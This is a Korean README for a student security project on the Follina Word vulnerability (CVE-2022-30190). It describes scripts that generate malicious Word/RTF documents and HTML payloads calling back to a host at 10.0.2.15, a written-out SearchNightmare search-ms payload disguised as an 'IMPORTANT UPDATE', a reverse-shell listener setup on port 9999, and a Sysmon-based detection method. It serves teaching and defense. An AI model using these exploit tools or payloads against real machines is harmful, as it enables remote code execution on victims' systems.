
풀스택 아카데미 사이버보안 프로젝트로, Follina(CVE-2022-30190) 취약점의 전체 사이클(익스플로잇부터 탐지 및 방어까지)을 분석합니다.
Follina(CVE-2022-30190) 취약점의 전체 사이클(익스플로잇부터 탐지 및 방어까지)을 검토하는 Fullstack Academy 사이버보안 프로젝트입니다.
팀:
이 도구 세트는 웹 호스트가 있거나 Python을 사용하여 생성된 또는 예제 페이로드 파일을 호스팅할 간단한 웹서버를 띄울 수 있다고 가정합니다.
Example Payloads 폴더의 파일에는 실제 악성 코드가 포함되어 있습니다. 이 파일들은 로컬 네트워크의 VM에서 사용되었으며, 모든 머신을 신뢰하는 보안 네트워크에서는 문제가 되지 않아야 하지만, 이러한 파일을 사용하거나 수정할 때는 주의하시기 바랍니다. 또한, 문서 및 페이로드 생성기는 당연히 자체 악성 파일을 생성합니다. 이러한 도구는 VM 또는 기타 일회용 환경에서만 사용하십시오! 이해하지 못하는 도구는 사용하지 마십시오.
Follina 익스플로잇이 포함된 Microsoft Word 문서를 생성하려면 다음 옵션을 사용하여 docgen_v3.py를 실행하십시오.
--extention/-e : 문서 출력을 기본값 .doc에서 rtf로 변경하여 제로 클릭 공격을 수행합니다. -e rtf--ip_address/-ip : 문서가 연결을 시도할 IP 주소를 변경합니다(기본값은 10.0.2.15).--port/-p : 연결을 시도할 포트를 변경합니다(기본값은 8000).페이로드 html 파일을 생성하려면 poc 하위 명령어를 사용하여 Windows 계산기를 여는 개념 증명 페이로드를 생성하거나 custom 하위 명령어를 사용하여 자체 스크립트로 페이로드를 생성하는 generate_payload.py를 사용하십시오.
예:
python generate_payload.py poc -o test.html은 test.html에 계산기 페이로드를 생성합니다.python generate_payload.py custom -o test.html -p "search-ms:query=procmon.exe&crumb=location:%5C%5Clive.sysinternals.com%5Ctools&displayname=IMPORTANT%20UPDATE"는 SearchNightmare 익스플로잇을 사용하는 사용자 정의 페이로드로 test.html을 생성합니다.예제 페이로드는 "Example Payloads" 폴더에서 찾을 수 있습니다.
Follina 탐지에는 이벤트를 기록하기 위해 Sysmon이 설치되어 있어야 합니다. 여기서의 탐지 방법은 Microsoft Word가 MSDT.exe를 호출하는 인스턴스를 찾는 데 의존하지만, 스크립트를 수정하여 Follina가 Powershell 명령에 사용하는 인수와 같은 다른 아티팩트를 검색할 수도 있습니다. 다음 도구를 사용할 수 있습니다.
모든 예제 docx 및 rtf 파일과 html 파일은 IP 주소 10.0.2.15에서 호스팅되는 페이로드를 가리킵니다. 또한, 리버스 셸 익스플로잇을 사용하려면 포트 9999에서 리스너를 설정하십시오.